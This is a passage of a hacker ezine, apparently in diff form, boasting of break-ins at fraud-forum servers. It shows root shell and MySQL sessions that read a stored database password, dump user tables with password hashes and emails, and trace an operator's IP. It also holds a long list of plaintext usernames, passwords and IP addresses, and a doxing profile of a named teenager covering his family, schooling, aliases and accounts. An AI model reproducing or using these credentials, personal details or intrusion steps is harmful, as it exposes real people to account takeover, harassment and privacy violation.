'/'); + +/** Sets up WordPress vars and included files. */ +require_once(ABSPATH . 'wp-settings.php'); + +# cd .. + +# cd el-basar.biz + +# ls -laR +total 12 +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 . +drwxr-x--- 5 ganymedes www 512 Oct 5 21:43 .. +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 85c91o822x3olps1d8179xizbm27 + +./85c91o822x3olps1d8179xizbm27: +total 12 +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . +drwxrwx--- 3 ganymedes www 512 Sep 26 22:54 .. +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 check + +./85c91o822x3olps1d8179xizbm27/check: +total 20 +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 . +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. +drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 vp2q910pxc2ifo091y + +./85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y: +total 16 +drwxrwxrwx 2 ganymedes www 6144 Sep 17 13:01 . +drwxrwxrwx 3 ganymedes www 512 Dec 13 2010 .. +-rw-r--r-- 1 www www 0 Aug 11 01:55 6337180250025522924 +-rw-r--r-- 1 www www 0 Aug 9 19:04 6337180250037669499 +... + +# Nothing left here anymore :(^C +# Better check the database ... + +# cat /etc/my.passwd +bde413a2c8751ac97887f11d6efb2c39 + +# mysql -u root -pbde413a2c8751ac97887f11d6efb2c39 +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 205220 +Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a + +Type 'help;' or '\h' for help. Type '\c' to clear the buffer. + +mysql> SHOW DATABASES; ++--------------------+ +| Database | ++--------------------+ +| information_schema | +| alg_forum | +| alg_hide | +| alg_zzz | +| crank2010_forum | +| crimecore_board | +| exchanger_db | +| filip_eldent | +| filip_eldent_ | +| ganymedes_bosscc | +| ganymedes_bossm | +| garf_ban | +| hcgcrew?forum | +| jeka-test_ | +| lordknight_forum | +| lordknight_teon | +| madrage_wbb | +| margosha_forum | +| margosha_sait | +| mmgen_3 | +| mmgen_ref | +| mmgen_shop | +| mr101_old | +| mr101_w3 | +| muraaat_mybb | +| mysql | +| onlineschauen_bi | +| onlineschauen_ho | +| onlineschauen_ma | +| onlineschauen_on | +| onlineschauen_se | +| pavlrse_xshop | +| propiska_gr | +| propiska_us | +| propiska_work | +| scenehack_board | +| snetwork_4g741 | +| snetwork_sh24op | +| szenevz_123 | +| szenevz_db | +| test | +| test4me_db | +| thefuelru_pp | +| useresu1_prava | +| useresu_bollist | +| vsocks_vsocks69 | +| vsocks_vsocks69_ | +| vsocks_vsocks69_a | ++--------------------+ +48 rows in set (0.00 sec) + +mysql> USE ganymedes_bosscc; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> SHOW TABLES; ++----------------------------+ +| Tables_in_ganymedes_bosscc | ++----------------------------+ +| admin_navi | +| navi_de | +| news | +| produkt_gruppen | +| produkt_items | +| produkte | +| psc | +| support | +| supporter | +| supporter_group | +| ukash | +| users | ++----------------------------+ +12 rows in set (0.00 sec) + +mysql> SELECT count(*), sum(guthaben) FROM psc; ++----------+---------------+ +| count(*) | sum(guthaben) | ++----------+---------------+ +| 74 | 1080 | ++----------+---------------+ +1 row in set (0.00 sec) + +mysql> # Not bad ... + +mysql> SELECT count(*) FROM users; ++----------+ +| count(*) | ++----------+ +| 1359 | ++----------+ +1 row in set (0.00 sec) + +mysql> SELECT * FROM users WHERE guthaben > 1; ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +| id | username | pass | email | reason | guthaben | access | ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +| 1 | blamedyy | ==44c8cf514440543c728bee1864a1a466 | blamedyy@yahoo.com | | 897 | 1 | +| 474 | hung2304 | ==2864d82ad1e49fffcafe85976c602868 | jidar@hotmail.de | faked psc | 8 | 33 | +| 485 | SlamD | ==65259faf801899cfd1f27b389b8849ac | arx2@gmx.net | | 3 | 0 | +| 555 | AEQUITAS | ==ee61e9fd8caafb735406838f18235281 | aequitas@z1p.biz | | 3 | 0 | +| 618 | Jettic | ==a1eba8157beb255a503e8b586e141b61 | jettic@mail.ru | | 3 | 0 | +| 634 | me2 | ==cfbf7976666e981d217cfed255d7db6e | fff8756@yahoo.de | | 3 | 0 | +| 640 | riddick | ==24217c603630ce2339503db1d009b8c7 | riddicker1@web.de | | 3 | 0 | +| 817 | Hilli | ==8e6a108a6555e604f9f652d679c7ab29 | shiva166@web.de | | 2 | 0 | +| 865 | killersm | ==6b8daaab17c40f5fbf9aab0db8dc21bf | jhir@jire.de | | 3 | 0 | +| 875 | skilled | ==195b9d5a1e7d2ef7237eb467533ec1f2 | sk@sk.com | | 3 | 0 | +| 943 | FatJoe | ==ed35e0bc4b6a22cd24f74e039533276f | sedaephi@emailgo.de | | 2 | 0 | +| 963 | Bogner | ==b3a0ad39806aced9241a80b9a11868e4 | placebo84@hotmail.de | | 3 | 0 | +| 971 | keks | ==572330601360f7945006cae2ea549bab | aggroberliner222@web | | 3 | 0 | +| 975 | saidone | ==aba11e56813d842283854c6ccccbef60 | saytec@gmx.de | | 3 | 0 | +| 1022 | lczero | ==37d1475d60b2c99b1c222a5a5acc2c58 | sdpfmodpmgg@web.de | | 3 | 0 | +| 1094 | peterpan | ==fdc6b6d13338d1b9f1099dcec97cb2a8 | tfmpp1@web.de | | 3 | 0 | +| 1261 | Tommy | ==7d01922eeaeb9682953c49fd20ece458 | tomdanger@rbcmail.ru | | 3 | 0 | +| 1443 | 2345176 | ==9ddfac889552a0cdf635e46c8c70b01b | b2121870@prtnx.com | | 3 | 0 | +| 1466 | badboy44 | ==3fa46350e1a9aa6f09a32cb342eb8c31 | anja_ludi@web.de | | 3 | 0 | +| 1484 | delphin | ==7b8d81c371ada9fd93a448c7ac45b346 | asdgasd@asdga.de | | 3 | 0 | +| 1494 | booom | ==ee6c8e07eed464a4842c2335b4977309 | jhghj@gggh.de | | 3 | 0 | +| 1512 | tetrispr | ==1e63fa4217770660acccbcf4acabfc67 | tatakiru@gmx.de | | 3 | 0 | +| 1513 | stage6 | ==660d11767f02a3a7403bfe47954de520 | carders@hotmail.de | | 3 | 0 | +| 1586 | m1sc | ==1d28ce4b9ff02e4a08432036f7316db1 | m1sc@gmx.de | | 3 | 0 | +| 1619 | anubis | ==dda9ab9768f7367198227e69b83cedbd | xAnuBiSx@gmx.de | | 3 | 0 | +| 1671 | carlos | ==2a363b531b95578a7d816dd02cde60d6 | carlos---@live.de | | 3 | 0 | +| 1715 | advanced | ==924f32ec3a868e5555ee1910d4242ce1 | advanced@gnx.de | | 3 | 0 | +| 1719 | Blizzard | ==74281aac5624b24fb3472feab558a5d1 | kgadkhagj@spambob.de | | 2 | 0 | +| 1735 | ripit | ==eed34671e873f2aa07d30d878f182ce0 | ripit@mailinator.com | | 3 | 0 | ++------+----------+------------------------------------+----------------------+-----------+----------+--------+ +29 rows in set (0.00 sec) + +mysql> Aborted + +There we got one of Ganymedes' other accountnames and his email: +blamedyy@yahoo.com. We better check out some proftpd logs. Ganymedes +constantly used proxies, but there is one login sequence where he did +not: + +# grep 93.232.*ganymedes proftpd-transfer.log +Mon Jan 24 15:34:21 2011 0 212.117.174.26 0 /home/ganymedes/el-basar.biz/85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y/6337180258293023293 a _ d r ganymedes ftp 0 * c +Mon Feb 07 02:04:40 2011 0 93.232.193.137 2416 /home/ganymedes/el-basar.biz/designe/design/navi.php a _ o r ganymedes ftp 0 * c +Mon Feb 07 02:04:45 2011 0 93.232.193.137 1709 /home/ganymedes/el-basar.biz/designe/design/title_gh.php a _ o r ganymedes ftp 0 * c +Mon Feb 07 02:09:23 2011 0 93.232.193.137 1917 /home/ganymedes/el-basar.biz/co2xcpqwlvxmi/config.php a _ o r ganymedes ftp 0 * c + +Deutsche Telekom AG, NRW, Germany. Well done kid. + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------==={ The Happy Ninja Faker }===))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Some of you guys might have noticed that a ~ | ||( );, +"HappyNinjas" Twitter account has been created ( ,;.)-\ / ';, +on the 4th or 5th February 2011 which seemed \ ( \ ( +to offer the opportunity to receive the latest || \\ +news regarding our actions. As we observed this /_( /_( +account got some attention and even obtained nearly 100 followers. +Hurray. However it isn't ours :( To get more publicity the creator +also published a fake zine called exp04.txt at +http://www.pva-apeldoorn.nl/exp04/exp04.txt. It was very clear that +the person didn't do this to help us or fight the fraudscene, but to +spread lies. So we did the only logical thing: We hacked that server +too, removed the fake and copied some logs. Here are some excerpts: + +2011-02-10 16:19:24 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04 - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.13 - - 301 + 0 0 370 399 500 +2011-02-10 16:19:26 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/index.html - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6 +.13 - - 200 0 0 316 400 687 +2011-02-10 16:58:53 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/exp04.txt - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6. +13 - http://twitter.com/ 304 0 0 236 527 296 + +Whups, looks like someone did a messy job there. Well, at least he +used a proxy. But after some black magic we also hacked the proxy and +it showed us the right way to payback. So who did this lousy job, you +may ask? Noone else but 3lite aka InVisible, (former) moderator and +admin of several fraud orientated message boards. It wasn't hard to +find more information about him, right Robin? + +To understand why someone would do such things we first have to +understand who he is. Robin is 19 years old and comes from a typical +middle class family. Both parents are employed, the father as an +administrative official, the mother as an industrial clerk. He also +has three sibs. His family consists of baptists (a crazy sect, calm +but annoying), thus it is not really surprising that his mother also +spends way too much money on esoteric medicine. I guess if you can +believe in the biblical history of creation you can believe in +anything. His education started at the grammar school (Gymnasium) in +2002. After two wasted years he switched to middle school +(Realschule). Three years later he had to switch again, this time to +secondary modern school (Hauptschule). The story of his life. This +year he finished technical college (Berufsfachschule) with a rather +bad grade. In his virtual life he mostly works with botsoftware, +infects people and sells the stolen data to other fraudsters. In other +words: he is a trojan skiddy. Sounds like a bored, unmotivated child +without much talent and that is exactly what he is. + +He used more than ten different nicknames in the past, because after a +while they all had a very bad reputation. And that are only the names +we know about, there are probably more. + + _ _____________________ _ + | | | | + |b| Deoxys |b| + |o| Aerodactyl |o| + , |x| Raid0n17 |x| + (@| | | DeoOxygen | | + ,, ,)|_____|o| ExplosiV / ExplOsiv |o|_______ +//\\8@8@8@8@8@8 / _ _ |f| Androx |f| _ _ _ \ +\\//8@8@8@8@8@8 \_____| | 3lite / 3lite2k11 | |_______/ + `` `)| |s| Raiden |s| + (@| |h| »InVisible |h| + |a| R@ven |a| + |m| Fr33w4re |m| + |e| VexX |e| + |_|_____________________|_| + +If you want to check him out yourself, here are some links. More +information can be found in the attached files. + +http://www.youtube.com/Raid0n17 +http://www.youtube.com/DeoOxygen +http://aerodactyl.wordpress.com/ +http://steamcommunity.com/profiles/76561197968670011 + +He loves to use variations of "1337" and "troll" as his passwords. +Very secure, you should give it a try. + +Our conclusion: This guy is really fucked up. He is a pathological +liar, a deadbeat, a scammer. Avoid him if you can. + +Side note: The following two texts have already been published by us, +because the given circumstances forced us to in that time. Since both +texts have not made it into an "official" ezine yet, we decided to +print them here. Have fun! + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((======={ Swissfaking.net }=====------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Swissfaking.net has not been in the center of +,;' \ /-(.;, ) our interest for long, mainly because one doesn't + ) / ) / hear a lot about it. From the outside they just + // || seem to be a small board, not any worse than + )_\ )_\ the average kiddyforums. +However, when looking at it closely, one notices that swissfaking +manages to fully compensate for their size with the most shrewd users. +These peoples' only interest seems to make money. Lots. Fast. No +matter what. Swissfaking consider themselves a very special community; +that's why the registration has been closed since 2009 and replaced by +an invite system. Under these circumstances one would not expect great +activity in the forums, though as we first logged in, we were +bombarded with piles of blinking flash ads. The most ridiculous one +was probably that of some fag selling credit cards. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| d3adline: | +| You want buy without any risks? You want fast car? You want hot | +| girls? You want have glamorous partys? Then buy ccs from d3adline | +|____________________________________________________________________| + +This again shows pretty well how ignorant those fucks are; as if a +credit card brought you from mom's basement to high life. Just because +the majority of swissfaking's users probably suffer from the same +mental disease as the mister quoted above, we have prepared a +treatment, but wait, before we start, here are Username:plain +password:IP:logintime of almost all users: + +p5n:@Copy10cv:91.89.69.182:January 2, 2011, 9:24 pm +mcdrive:belinea:188.23.69.210:January 2, 2011, 11:19 pm +n3ro:LbiI:{mq>K kZäj`,}} :213.232.200.177:January 3, 2011, 7:30 pm +pandora:nokia6280:84.61.88.65:January 2, 2011, 10:36 pm +fenriz187:gelomyrtol:92.225.202.186:January 6, 2011, 8:09 pm +tezeewood:26nu4uku26nu4uku$:109.91.113.26:January 2, 2011, 9:16 pm +china:§k$vf@n1:81.210.136.47:January 2, 2011, 11:54 pm +ibrains:qw2io0pl:46.115.102.70:January 2, 2011, 9:29 pm +rox:rox24255:80.122.42.30:January 3, 2011, 11:45 pm +slash:keinproblem15:83.135.112.150:January 3, 2011, 1:21 am +punisher:youtube26:85.180.135.133:January 2, 2011, 11:27 pm +lolboter:EsPZLtQa2x=9Mf@I:80.171.11.252:January 5, 2011, 11:55 pm +fasti1001:lasterraster:77.20.136.173:January 4, 2011, 11:22 am +d0pz:lollollol123miregal95:213.163.64.43:January 2, 2011, 11:48 pm +tolja:fujitsusiemens22:91.61.147.49:January 2, 2011, 11:55 pm +solt:lolgolol:95.143.192.159:January 2, 2011, 9:09 pm +beex:ab1cd2:91.89.190.46:January 2, 2011, 9:56 pm +pimperich:M1YgRgXB:79.228.118.129:January 3, 2011, 10:28 am +curly:Eminem:79.193.89.45:January 2, 2011, 10:10 pm +jasmin75:yId69xqsmBve:87.150.137.16:January 2, 2011, 9:29 pm +justmike:t3xxe33:84.168.231.191:January 2, 2011, 10:10 pm +du3en:kjxxdj13:92.73.69.139:January 2, 2011, 11:00 pm +dr.bob:Swissfaking2011:84.61.238.224:January 2, 2011, 10:13 pm +prototype:matrix:46.126.244.198:January 3, 2011, 2:13 am +winkelmann72:jonaskiessling:89.208.35.190:January 2, 2011, 10:03 pm +tollik:audi80:93.205.10.77:January 2, 2011, 9:43 pm +cybi0nic:67k57eiSswissfaking:93.182.171.109:January 3, 2011, 4:10 pm +wuschi:fetterJaxel:82.83.42.21:January 3, 2011, 8:26 am +juan:55555:217.23.6.162:January 3, 2011, 6:24 pm +fusselpo:schatz11:77.22.240.27:January 4, 2011, 10:00 pm +nomercy:ymZZIFIF0nCZZ$BW:62.143.126.35:January 2, 2011, 9:26 pm +jamyla:2wsx6zhn:93.217.241.134:January 6, 2011, 5:33 pm +nemiz:2z3545:94.220.79.39:January 4, 2011, 11:47 pm +theird21:kmk00025879:217.88.114.20:January 2, 2011, 11:11 pm +corvu5:corvu54swissfaking:95.222.116.238:January 2, 2011, 10:13 pm +s0xtech:s0xy0000:217.231.252.159:January 2, 2011, 9:39 pm +speedygamer:Nzhdtlcwb1:89.149.242.16:January 3, 2011, 12:39 am +die-wiese:Ventura83:188.193.8.225:January 3, 2011, 12:47 pm +goldrock:56&6ght$$!awwEfb:62.167.138.232:January 2, 2011, 10:48 pm +devilboy:pelubo62:87.106.94.167:January 4, 2011, 3:04 pm +fam0us:ichliebedich1:92.241.168.24:January 2, 2011, 10:49 pm +ares:mmmmmmmmm:80.108.172.227:January 5, 2011, 9:48 pm +imer:misakifan:93.217.127.220:January 2, 2011, 9:48 pm +secdaking:$p!tT3r2k!0:79.211.101.154:January 3, 2011, 12:36 am +seriousman:regen@44:79.203.222.236:January 2, 2011, 11:08 pm +mpcool:famous:77.183.227.158:January 3, 2011, 5:13 pm +sine:ninaninabekim:79.197.201.62:January 2, 2011, 10:14 pm +famous:aLq3lm$%:92.241.190.253:January 2, 2011, 10:29 pm +psych0:achtzehn32:79.204.163.237:January 3, 2011, 3:41 pm +trickz:crazyfrog1234:87.118.118.37:January 2, 2011, 9:27 pm +pseudo:hackedbypseudo:78.48.103.103:January 2, 2011, 9:45 pm +n00be:kjvhjvhjhvmvh:92.241.190.253:January 2, 2011, 10:11 pm +txto:123456:88.67.188.148:January 3, 2011, 2:17 am +mehmet111:hahaka:66.90.73.223:January 3, 2011, 4:28 am +daemon:weed1337:84.149.94.90:January 3, 2011, 6:45 pm +sugar:xip6hexi0:217.91.210.243:January 4, 2011, 9:12 am +dextrose:.l33rlauf:92.241.168.90:January 2, 2011, 11:04 pm +weareone:Ichwurdeam23.07.1994geboren.:212.117.174.26:January 2, 2011, 9:49 pm +fatalerror:pulamea18:88.117.121.105:January 4, 2011, 2:39 pm +devolo:PT1346798522!:93.130.53.175:January 2, 2011, 10:14 pm +lestat:123456:79.236.62.169:January 3, 2011, 4:30 pm +zahlenpilz:hacksector:92.77.4.189:January 3, 2011, 9:33 pm +ivenom:1337s!lenTxD:87.143.216.239:January 2, 2011, 9:45 pm +stegen:daniel:188.194.83.146:January 6, 2011, 4:54 pm +ch4in:1384gwm123:217.187.138.90:January 3, 2011, 12:14 am +hesgoodboy:01724186115:217.114.211.242:January 3, 2011, 1:30 pm +michi:äöüäöü:91.42.237.242:January 2, 2011, 9:14 pm +lazarus:Google123:85.178.160.144:January 2, 2011, 9:30 pm +paran0id:bravsobrav:212.117.160.22:January 2, 2011, 9:01 pm +simul4nt:comnoboat:109.192.198.159:January 3, 2011, 12:23 am +dicethrower:12wue345rfe6l:212.23.103.26:January 3, 2011, 2:35 pm +raydo:h3llboy:93.208.239.102:January 4, 2011, 12:04 am +janus:vladimir:92.107.113.49:January 2, 2011, 10:49 pm +crankrex:monohydrat:95.89.188.29:January 3, 2011, 7:17 pm +paradox:BTYM8h:92.241.168.90:January 2, 2011, 9:25 pm +bluehero:1qay2wsx:84.138.178.123:January 2, 2011, 11:50 pm +nobody:pagewrapper:83.170.114.16:January 6, 2011, 12:06 am +freakout:Ghana11:178.200.60.53:January 4, 2011, 10:35 pm +loop:1337loopi:78.48.162.155:January 4, 2011, 9:44 am +phr34kz:UX3eXfSzZ5q7N0{:212.117.162.222:January 2, 2011, 9:19 pm +hoodstar:lieblingssarah271994:78.50.94.114:January 4, 2011, 12:45 am +alphahack:alphahack:188.108.81.215:January 3, 2011, 11:59 pm +silence:8530ch:91.65.94.151:January 2, 2011, 9:16 pm +christian:123456:78.42.172.154:January 2, 2011, 10:05 pm +batonde:gDHoCJHG-6*Ae1Lj:88.73.87.81:January 6, 2011, 7:38 pm +jokereloaded:stefan1337!:217.225.87.229:January 3, 2011, 11:22 am +oneone1:BVBBERKY212:91.33.186.9:January 3, 2011, 3:34 pm +vodka:159ZAYCXS792QUALIAdRO//:217.255.207.169:January 2, 2011, 9:25 pm +killermouse:kiffer:78.55.117.164:January 3, 2011, 11:26 pm +run.:duschlampen!1:79.194.93.91:January 3, 2011, 9:45 pm +1337_reaction:1002003000:92.241.165.69:January 2, 2011, 9:55 pm +king6545:Soh2vebo333:178.203.138.49:January 4, 2011, 11:31 pm +basics:nicki123!:91.67.60.117:January 2, 2011, 9:03 pm +deco:julian08:178.202.239.33:January 2, 2011, 9:38 pm +ricardiazz:swissfaking:89.13.14.5:January 2, 2011, 9:16 pm +delax:hackerfun:188.193.194.86:January 2, 2011, 9:11 pm +jamesfb:fenerbahce:94.221.91.129:January 2, 2011, 10:43 pm +icebox87:apfel23:79.253.148.110:January 3, 2011, 1:50 pm +tryit:187lalalala187#:88.70.196.173:January 2, 2011, 11:46 pm +mrk:422mark646:62.178.8.56:January 3, 2011, 12:43 am +peter_pan:2bon2b:62.143.149.223:January 6, 2011, 9:33 am +tweaknap:%$HD1337PS$%:178.142.84.178:January 3, 2011, 12:11 am +nokz:aufleg0rn:92.227.68.28:January 3, 2011, 8:33 am +shoxx:g07091992:92.74.162.228:January 3, 2011, 4:34 pm +edgeee:za32qt4s.:80.201.55.194:January 3, 2011, 2:15 pm +w.t.f.:lol123:217.226.243.83:January 3, 2011, 11:06 pm +d3rd0n:12cocsli:93.217.26.178:January 3, 2011, 2:52 am +sp33djunkie:17331733:212.117.162.222:January 2, 2011, 9:24 pm +infomailer:9ö7&4k.ü_ä VmSH.NmwD:77.23.8.178:January 2, 2011, 10:01 pm +nesia:Nummer13Lebt!!!:82.82.167.173:January 4, 2011, 11:13 am +nyuu:123456789:87.122.143.30:January 2, 2011, 10:03 pm +selix:Bitrate187:188.192.238.47:January 3, 2011, 12:09 pm +smithz:Sarah1988:92.241.190.253:January 3, 2011, 1:40 am +ryl666:lolomg123:83.216.241.77:January 2, 2011, 10:20 pm +boardmaster2010:16052009:78.55.59.70:January 3, 2011, 9:06 pm +siverman:276910:77.187.55.123:January 3, 2011, 2:03 pm +deathnote:Shinigami1:91.113.13.4:January 3, 2011, 5:19 pm +ghostt:qawsed:95.128.242.224:January 6, 2011, 3:11 am +kingmail:1qay2wsx3edc4rfv:79.209.8.113:January 3, 2011, 2:40 pm +xxlegendaxx:123234:89.217.150.18:January 3, 2011, 11:25 am +ndtbit:ndtbit7:80.146.17.64:January 3, 2011, 1:33 am +anno:valerka:90.136.45.75:January 4, 2011, 8:04 pm +garrisson:hallo123:92.106.62.29:January 3, 2011, 12:45 pm +spitfir3:012345:93.232.245.248:January 6, 2011, 12:41 pm +z0mg:hitler123456:77.23.89.32:January 3, 2011, 4:18 am +prisma:dasydasy15:87.166.73.53:January 3, 2011, 11:31 pm +itunes:edu123hil:24.170.79.116:January 3, 2011, 10:55 pm +leopard:teufeline<3swiss:213.163.64.43:January 2, 2011, 9:35 pm +m00n:berlin123:188.193.230.70:January 2, 2011, 9:51 pm +danemone:danemonekoklopspocicdvbt:92.241.168.24:January 4, 2011, 2:39 am +rolf32:fickmich069:213.163.65.50:January 2, 2011, 10:49 pm +accoli:hallo123:80.80.246.188:January 4, 2011, 11:23 am +st0re:123456:109.193.140.236:January 3, 2011, 4:22 pm +wrigleys:schwippschwapp999:93.192.161.49:January 2, 2011, 9:28 pm +jigga666:159951baumheide123:109.90.93.220:January 2, 2011, 11:42 pm +sar:6%$45De§$wER:92.231.164.131:January 3, 2011, 12:40 am +deffjeff:30111970:94.219.18.179:January 4, 2011, 1:48 pm +playa_:1abc23z1:217.248.142.13:January 2, 2011, 9:54 pm +cy0n!x:55de!xz7:178.3.205.85:January 4, 2011, 4:31 pm +mc_wrei:fiona2:84.75.38.254:January 3, 2011, 8:49 pm +br0unce:!$spainyswiss$:85.214.39.134:January 2, 2011, 9:00 pm +saxas:6bhy&#nVKenahwLU7oj6WzD&JA%ZnT:89.217.182.32:January 2, 2011, 9:35 pm +peevee:aimer89:78.50.91.135:January 3, 2011, 2:45 am +mark21:wiesonicht:217.248.156.69:January 3, 2011, 12:22 am +keks:Rof1rwe88$:178.1.51.57:January 3, 2011, 1:52 pm +cyborgx:dihodo62:91.50.105.196:January 3, 2011, 2:15 am +tomdanger:gogogo123:92.241.168.24:January 2, 2011, 9:34 pm +logg23:koruku11:91.48.156.95:January 2, 2011, 9:35 pm +inferior:210340:91.113.110.183:January 4, 2011, 2:56 pm +djinn:m28h611!:109.90.88.103:January 3, 2011, 8:05 pm +fred777:swissfaking.6x.toto:91.17.194.74:January 3, 2011, 1:22 am +w00dka:technobase1337:91.7.224.30:January 2, 2011, 10:51 pm +achmatov:hansdieter1:87.148.16.206:January 2, 2011, 11:51 pm +acidraining:$@cidr@ining$:95.208.135.191:January 3, 2011, 12:56 am +h0us3:josiaistschwarz:85.25.184.102:January 2, 2011, 9:10 pm +franky:Franky12345678909*:212.117.172.231:January 2, 2011, 9:16 pm +blueye:gnomi1337:202.60.66.32:January 3, 2011, 5:04 pm +chillerdady:K@t0LiDoR:87.181.209.28:January 3, 2011, 12:28 am +flash:nx6200ax:217.94.255.158:January 2, 2011, 11:59 pm +kuku:kuhfrosch123:79.242.127.235:January 3, 2011, 5:45 pm +mr.ru:kaik88ka:92.241.165.69:January 4, 2011, 1:56 am +n!sk:madonna119:95.143.192.190:January 2, 2011, 10:31 pm +kk3kk:Soundzz12:78.54.51.234:January 3, 2011, 3:07 am +raupi419:klISDMoVPNycc6zYnvLw3CaG:46.126.220.35:January 2, 2011, 9:31 pm +binary:sänger44:178.238.142.242:January 2, 2011, 11:41 pm +blu3cod3:lj49:93.220.25.103:January 5, 2011, 1:04 pm +armizor:qwerdxyas1234:91.48.104.120:January 3, 2011, 5:06 pm +zerox:Einfach-111:79.229.219.110:January 2, 2011, 10:36 pm +n0ise:Malle09*geil!!:212.117.165.197:January 3, 2011, 12:53 am +hard$tyler:martin55:92.241.190.253:January 6, 2011, 1:03 pm +ezel:enbüyükallah:85.177.167.57:January 2, 2011, 10:01 pm +spacejovi:Sara06.10:81.173.147.225:January 2, 2011, 9:25 pm +kingsize89:lesane25121989:78.42.183.79:January 2, 2011, 11:12 pm +sushi:SmokingGras:79.197.71.162:January 5, 2011, 11:05 pm +joe:12345asd:213.163.65.50:January 5, 2011, 4:08 pm +syntex:knallfrosch221:93.212.172.91:January 4, 2011, 10:55 am +afroman:JGMlms91:94.220.85.64:January 3, 2011, 4:27 am +master2k:5e4d3c2b1a:212.117.165.197:January 3, 2011, 12:07 pm +inex:coldmaster1337:93.82.245.122:January 5, 2011, 3:40 pm +smile:saufen123456:89.204.137.180:January 2, 2011, 11:05 pm +cch:anit77:93.232.245.48:January 6, 2011, 12:38 am +ziiieper:Computermausi21:188.100.191.130:January 2, 2011, 9:01 pm +moses908:161286:178.142.75.51:January 3, 2011, 3:17 am +sensemann88:10051964:79.248.91.90:January 6, 2011, 3:52 pm +eddy:aspirine:92.203.35.1:January 4, 2011, 5:54 pm +kugelblitz:WaBaXLx1:93.212.129.172:January 3, 2011, 8:20 pm +jamesdean:1qwerbeet:93.217.25.62:January 3, 2011, 4:32 pm +m0nic:IbebLadJ1993 #!:87.118.120.182:January 2, 2011, 9:24 pm +insame:crunk1994:88.67.124.238:January 2, 2011, 9:07 pm +psychoink:l*8R&t3CpgW6rw5z5H:82.82.217.166:January 3, 2011, 1:18 pm +jaroslav:ramona6305600:87.189.172.31:January 2, 2011, 9:20 pm +reto:dragon11:77.194.252.92:January 4, 2011, 4:20 pm +xerox:D#fqh88jb:89.182.159.187:January 2, 2011, 11:09 pm +gamerfis:$&%?ZJ94:85.176.78.21:January 2, 2011, 11:14 pm +nko:password:nox:87.173.185.216:January 3, 2011, 12:31 pm +yaboybigt:=-_})-=0:81.210.167.79:January 3, 2011, 5:11 am +bonx:bubu1818:89.204.153.167:January 4, 2011, 1:54 pm +dogma:walkthelineswiss:92.106.249.125:January 3, 2011, 1:24 am +ratzi:lusenheide:109.91.140.55:January 7, 2011, 12:33 am +3p!cf4!l:tele2sux:92.241.165.69:January 5, 2011, 2:55 pm +nagilum:gilgamesch1415926535:84.19.169.234:January 2, 2011, 9:28 pm +3dr:leeroyjenkins:84.59.162.27:January 2, 2011, 11:22 pm +erazorx8:ficken:92.225.129.75:January 4, 2011, 6:32 pm +mopedfahrer:mozilla006:84.19.169.162:January 5, 2011, 10:46 pm +darookie:Pr0d1gyThe:87.159.47.180:January 3, 2011, 12:08 am +paranoid:crbahP962P:91.66.225.130:January 3, 2011, 6:10 pm +devil234:R/m<7ctN&AEr +require valid-user + + +1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. + +# cd board && ls -la +total 2416 +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 . +drwxr-xr-x 6 swissfaking swissfaking 4096 Dec 31 18:47 .. +-rw-r--r-- 1 swissfaking swissfaking 238 Oct 24 13:33 .htaccess22foo +-rw-r--r-- 1 swissfaking swissfaking 39 Oct 24 13:33 .htpasswd +-rw-r--r-- 1 swissfaking swissfaking 23823 Mar 26 2010 ajax.php +-rw-r--r-- 1 swissfaking swissfaking 75490 Mar 26 2010 album.php +-rw-r--r-- 1 swissfaking swissfaking 17119 Mar 26 2010 announcement.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 archive +-rw-r--r-- 1 swissfaking swissfaking 18288 Mar 26 2010 attachment.php +-rw-r--r-- 1 swissfaking swissfaking 35093 Apr 14 2010 banned.jpg +drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 17 21:25 banners +-rw-r--r-- 1 swissfaking swissfaking 75309 Mar 26 2010 calendar.php +-rw-r--r-- 1 swissfaking swissfaking 43 Mar 26 2010 clear.gif +drwxr-xr-x 5 swissfaking swissfaking 4096 Jan 2 16:30 clientscript +-rw-r--r-- 1 swissfaking swissfaking 15346 Mar 26 2010 converse.php +-rw-r--r-- 1 swissfaking swissfaking 555 Oct 24 13:33 cookie.html +drwxr-xr-x 8 swissfaking swissfaking 4096 May 7 2010 cpstyles +-rw-r--r-- 1 swissfaking swissfaking 49309 May 19 2010 credits.php +-rw-r--r-- 1 swissfaking swissfaking 3299 Mar 26 2010 cron.php +drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customavatars +drwxr-xr-x 